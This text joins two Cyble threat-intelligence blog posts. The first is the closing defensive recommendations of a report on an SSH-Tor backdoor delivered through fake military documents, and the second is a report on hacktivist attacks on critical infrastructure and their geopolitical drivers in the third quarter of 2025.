Implementing obfs4-obfuscated Tor communications makes network detection significantly more challenging, so defense teams should focus on analyzing endpoint behavior, monitoring process execution, and auditing scheduled tasks.

Military units and Defense sector organizations are vulnerable to social engineering attacks that utilize realistic-looking military documents.

While the TTPs align with known campaigns and threat actors, we are continuing to collect additional intelligence and evidence to accurately attribute this activity to the associated threat actor.

Recommendations

• Strengthen Email Filtering and User Training: Implement sophisticated email security measures to identify nested archives and files with double extensions. Train personnel to verify document authenticity through secondary channels before opening attachments with military themes. Establish clear protocols for handling unexpected official documents received via unofficial channels.
• Deploy Behavioral Endpoint Detection: Implement EDR solutions with behavioral analytics to detect suspicious PowerShell execution, unauthorized scheduled tasks, and processes listening on non-standard ports. Configure alerts for binaries executing from AppData directories and applications making localhost SOCKS proxy connections.
• Block Tor Network Communications: Implement network controls to detect and block Tor traffic, including obfs4 obfuscated connections. Maintain updated threat intelligence feeds with Tor relay IP addresses and deploy deep packet inspection to identify anonymization protocols. Apply egress filtering to prevent unauthorized use of anonymization networks.
• Monitor Scheduled Task Creation: Restrict scheduled task privileges to administrators and monitor all new task creations. Enable Windows Event Log alerting for scheduled tasks executing scripts or binaries from user directories. Conduct regular audits of existing tasks and implement application control policies to restrict unauthorized executables.
• Implement SSH Key Management Controls: Deploy centralized SSH key management and monitor for unauthorized OpenSSH installations on Windows endpoints. Audit authorized_keys files regularly and alert on SSH services listening on non-standard ports. Monitor for unusual, localhost-originated RDP, SMB, and SFTP connections that indicate tunneled command-and-control activity.

MITRE TTPs

Indicators of Compromise

References

https://cert.gov.ua/article/6281701

The post Weaponized Military Documents Deliver Advanced SSH-Tor Backdoor to Defense Sector appeared first on Cyble.

Hacktivist attacks on critical infrastructure grew throughout the third quarter of 2025, and by September, accounted for 25% of all hacktivist attacks. 

If that trend continues, it would represent a near-doubling of attacks on industrial control systems (ICS) from the second quarter of 2025. 

Cyble’s assessment of the hacktivism threat landscape in the third quarter of 2025 found that while DDoS attacks and website defacements continue to comprise a majority of hacktivist activity, their share continues to decline, as ideologically-motivated threat groups expand their focus to include ICS attacks, data breaches, unauthorized access, and even ransomware. 

Z-Pentest emerged in the fall of 2024 as the hacktivist group most targeting ICS systems, but in the third quarter the threat group was also joined by Dark Engine (aka Infrastructure Destruction Squad), Golden Falcon Team, INTEID, S4uD1Pwnz, and Sector 16. 

Russia-aligned hacktivist groups INTEID, Dark Engine, Sector 16, and Z-Pentest were responsible for the majority of recent ICS attacks, primarily targeting Energy & Utilities, Manufacturing, and Agriculture sectors across Europe. Their campaigns focused on disrupting industrial and critical infrastructure in Ukraine, EU and NATO member states. 

Some of Z-Pentest’s targets in the third quarter included a water utility HMI system in the U.S. and an agricultural biotechnology SCADA system in Taiwan. The group often posts videos of its members tampering with critical infrastructure control panels, as they did in the recent U.S. and Taiwan incidents. 

Critical infrastructure attacks by hacktivist groups have continued into the fourth quarter, and the Canadian Centre for Cyber Security just this week warned of ICS attacks in that country. 

Most Active Hacktivist Groups and Targets 

NoName057(16) retained the largest share of observable operations despite attempts by law enforcement to disrupt the threat group. Z-Pentest and Hezi Rash increased their proportional footprint, together representing a meaningful slice of activity compared with the start of the quarter. Several once-prominent actors contracted sharply: Special Forces of the Electronic Army, Jokeir_07x, and BL4CK CYB3R all lost ground, their relative contributions dwindling to a marginal portion. A handful of emerging groups — including Red Wolf Cyber Team and INTEID — strengthened their visibility and now constitute a notable minority. 

The chart below shows the most active hacktivist groups in the third quarter. 

Among the noteworthy incidents in the quarter, the Belarusian group Cyber Partisans BY, together with Silent Crow, claimed to have compromised the IT infrastructure of Russian state airline Aeroflot, exploiting alleged Tier-0 access for nearly a year. The attackers reportedly gained control over significant IT assets, disrupting key systems and exfiltrating more than 22TB of data. Russia’s General Prosecutor confirmed a cyberattack that caused major flight delays and cancellations at Sheremetyevo Airport. The groups also claimed the destruction of around 7,000 servers. 

The Ukrainian Cyber Alliance and BO Team announced a breach of a Russian manufacturer involved in military drone production. Leaked materials purportedly included engineering blueprints, VMware snapshots, storage mappings, and CCTV footage from UAV assembly facilities. The attackers claimed they wiped servers, backups, and cloud environments after data exfiltration. 

Among the hacktivist groups moving into ransomware, Team BD Cyber Ninja’s “Black Hat” division claimed to have released a custom ransomware tool that they advertise as “100% FUD” (fully undetectable), able to encrypt Windows systems and lock the disk at the Master Boot Record (MBR), rendering affected hosts non-bootable. The group’s claims remain unverified. 

The hacktivist collective Liwa’ Muhammad announced the release of its Ransomware-as-a-Service (Raas) with a double-extortion model, named ‘BQTLock’ (BaqiyatLock) in July. The group claims multiple Raas variants for encrypting Linux, Windows, and macOS systems. 

Among the sectors targeted during the third quarter, government and law-enforcement targets continued to dominate, but their share declined markedly, dropping from nearly one-third of all incidents in July to about one-quarter by September. Energy and Utilities grew proportionally, expanding their share by almost half, while Telecommunications and Media each recorded moderate proportional gains. 

Below is a chart showing sectors targeted by hacktivist groups in the third quarter. 

Hacktivism and Geopolitical Conflict 

Geopolitical conflict remains a primary motive in hacktivist campaigns. 

Hacktivist campaigns in Southeast Asia illustrated how border tensions rapidly translated into coordinated digital offensives. The Thailand–Cambodia border conflict triggered intense cross-border cyber aggression, with nationalist groups leveraging DDoS attacks, website defacements, and data leaks to reinforce territorial narratives. However, as regional hostilities eased, the focus shifted away from Southeast Asia toward new flashpoints. 

In South Asia, hacktivism remained highly reactive to political symbolism and historical grievances. The India–Pakistan and India-Bangladesh rivalries once again shaped cyberspace, with both sides conducting retaliatory and ideologically framed attacks. These operations were amplified by disinformation efforts seeking to portray cyber incidents as extensions of insurgent activity. 

The Middle East continued to experience a digital spillover from ongoing physical conflicts. The Israel–Hamas war has fueled a surge in politically motivated cyber activity. In response to Israel’s blockade and military operations, pro-Palestinian and Islamist-aligned hacktivists intensified campaigns against Egypt, Israel, and their regional allies. The Houthi–Saudi Arabian conflict added to regional instability, with hacktivist groups aligned with both Saudi and Houthi interests conducting cyber operations in support of their respective sides. 

In Europe, the dismantling of NoName057(16) infrastructure under Operation Eastwood triggered retaliatory activity by pro-Russian networks, reaffirming the resilience and adaptability of state-aligned hacktivist ecosystems. Simultaneously, the Russia–Ukraine war and broader confrontation with NATO drove sustained cyber aggression across Eastern and Northern Europe, particularly in the Baltic States and Finland. 

A notable trend emerged in the Philippines, where domestic political unrest and corruption scandals invited a surge in cyberattacks against state institutions. This rise underscored the increasing use of hacktivism as a tool of internal dissent. 

Most Targeted Countries by Hacktivists 

Ukraine was the leading target of hacktivist campaigns in the third quarter, primarily due to the ongoing Russia–Ukraine war and associated proxy cyber activity from pro-Russian groups and their international allies. 

In contrast, Thailand and India—previously among the most targeted states—experienced a sharp contraction in hacktivist operations. The downturn aligned with the easing of border hostilities between Thailand and Cambodia and the fading of nationalist cyber campaigns surrounding India’s Independence Day. 

Meanwhile, the Philippines emerged unexpectedly as a high-profile target following domestic unrest and allegations of government corruption, marking a regional pivot within Southeast Asia. 

Saudi Arabia and Finland saw renewed exposure, each linked to broader geopolitical developments—Saudi Arabia’s involvement in regional conflicts, especially with the Houthis militia in Yemen, and Finland’s integration into NATO’s security framework. Egypt and the UAE continued to attract low but persistent activity tied to Middle Eastern crises, particularly the Gaza–Egypt border tensions. The United States maintained a steady, symbolic presence as a target, while Morocco and Italy registered modest increases consistent with wider European and North African instability. 

Conclusion 

The growing sophistication of the leading hacktivist groups is by now an established trend and will likely continue to spread to other groups over time. 

That means that exposed environments in critical sectors can expect further compromise by hacktivist groups, advanced persistent threats (APTs), and others known to target critical infrastructure. 

Critical assets should be isolated from the Internet wherever possible, and operational technology (OT) and IT networks should be segmented and protected with Zero Trust access controls. Vulnerability management, along with network and endpoint monitoring and hardening, is another critical cybersecurity best practice.  

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization today.  

The post Hacktivist Attacks on Critical Infrastructure Surge: Cyble Report appeared first on Cyble.